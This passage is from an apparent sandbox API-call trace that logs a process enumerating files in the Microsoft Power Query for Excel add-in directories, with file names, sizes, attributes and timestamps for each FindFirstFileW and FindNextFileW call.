ftLastWriteTime.dwLowDateTime=0xfbd2face, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x10aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.666] FindNextFileW (in: hFindFile=0xf71ec0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d2b978, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.666] FindNextFileW (in: hFindFile=0xf71ec0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x51c07e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51c07e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51c07e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.666] FindNextFileW (in: hFindFile=0xf71ec0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56f7a52, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56f7a52, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x595a0ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.666] FindNextFileW (in: hFindFile=0xf71ec0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56f7a52, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56f7a52, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x595a0ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0047.666] FindClose (in: hFindFile=0xf71ec0 | out: hFindFile=0xf71ec0) returned 1 [0047.667] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.667] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ko", cAlternateFileName="")) returned 1 [0047.667] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ko\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71dc0 [0047.668] FindNextFileW (in: hFindFile=0xf71dc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.668] FindNextFileW (in: hFindFile=0xf71dc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.668] FindNextFileW (in: hFindFile=0xf71dc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4b0be25, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4b0be25, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c3d17b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.668] FindNextFileW (in: hFindFile=0xf71dc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf12b7378, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf12dd5ae, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x34040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.668] FindNextFileW (in: hFindFile=0xf71dc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5101cbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.668] FindNextFileW (in: hFindFile=0xf71dc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5101cbd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 0 [0047.668] FindClose (in: hFindFile=0xf71dc0 | out: hFindFile=0xf71dc0) returned 1 [0047.669] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.669] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lt", cAlternateFileName="")) returned 1 [0047.669] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lt\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71fc0 [0047.670] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.670] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfbc97147, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfbc97147, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfbce360e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xeaa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.671] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x22f6470, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x22f6470, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x22f6470, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.671] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6bad1cb, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6bad1cb, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6bad1cb, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.671] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa853100, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa853100, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.671] FindNextFileW (in: hFindFile=0xf71fc0, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfa853100, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfa853100, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xfa853100, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8b040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.671] FindClose (in: hFindFile=0xf71fc0 | out: hFindFile=0xf71fc0) returned 1 [0047.671] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.671] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0047.672] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\lv\\*", lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xf71b40 [0047.672] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0047.672] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x59f29de, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x59f29de, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x59f29de, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.672] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffddb96c, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffddb96c, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffddb96c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x28040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0047.672] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf00d5872, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf00d5872, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf00d5872, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~1.DLL")) returned 1 [0047.673] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf8f7076d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf8f7076d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8e040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.673] FindNextFileW (in: hFindFile=0xf71b40, lpFindFileData=0x32ee464 | out: lpFindFileData=0x32ee464*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf8f7076d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf8f7076d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x8e040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 0 [0047.673] FindClose (in: hFindFile=0xf71b40 | out: hFindFile=0xf71b40) returned 1 [0047.673] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x3ce00c0 | out: hHeap=0x2a60000) returned 1 [0047.673] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf80afe67, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf80afe67, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf80afe67, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xee40, dwReserved0=0x0, dwReserved1=0x0, cFileName="mashupcompression.dll", cAlternateFileName="MASHUP~1.DLL")) returned 1 [0047.673] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf5afc9d3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf5afc9d3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf618b1a4, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xa08b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Data.Edm.NetFX35.dll", cAlternateFileName="MIE429~1.DLL")) returned 1 [0047.673] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x5174318, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x5174318, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5174318, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1610c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Data.OData.NetFX35.dll", cAlternateFileName="MI37F8~1.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6aef645, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6aef645, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6b15891, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2c068, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Data.OData.Query.NetFX35.dll", cAlternateFileName="MI8F9F~1.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfe368d, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xfe368d, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1698075, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x112040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Exchange.WebServices.dll", cAlternateFileName="MIE0C3~1.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x670f8d9, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x670f8d9, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x670f8d9, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x217840, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.dll", cAlternateFileName="MI0E0A~1.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45f9db0, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf45f9db0, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf45f9db0, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x6840, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Excel.EditorRibbon.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4d20ecd, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4d20ecd, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf5a3de35, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x32a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Initialization.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7bc5054, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7bc5054, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7bc5054, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x14840, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Models.dll", cAlternateFileName="MIC507~1.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xfcfa9f2d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xfcfa9f2d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd42fe2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x23a5040, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Client.Windows.dll", cAlternateFileName="MI7BEA~1.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xa8619f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xa8619f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xb91216, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x48d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Container.exe", cAlternateFileName="MICROS~2.EXE")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x88e2fa3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x88e2fa3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x92201bc, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5070, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Container.NetFX40.exe", cAlternateFileName="MICROS~3.EXE")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6d76e38, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6d76e38, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6de953e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x4ad0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Container.NetFX45.exe", cAlternateFileName="MICROS~1.EXE")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf7b9ee02, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf7b9ee02, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf7b9ee02, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1e0ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Mashup.Document.dll", cAlternateFileName="MI8E0B~1.DLL")) returned 1 [0047.674] FindNextFileW (in: hFindFile=0xf71c00, lpFindFileData=0x32ee6e8 | out: lpFindFileData=0x32ee6e8*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bd443f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bd443f, 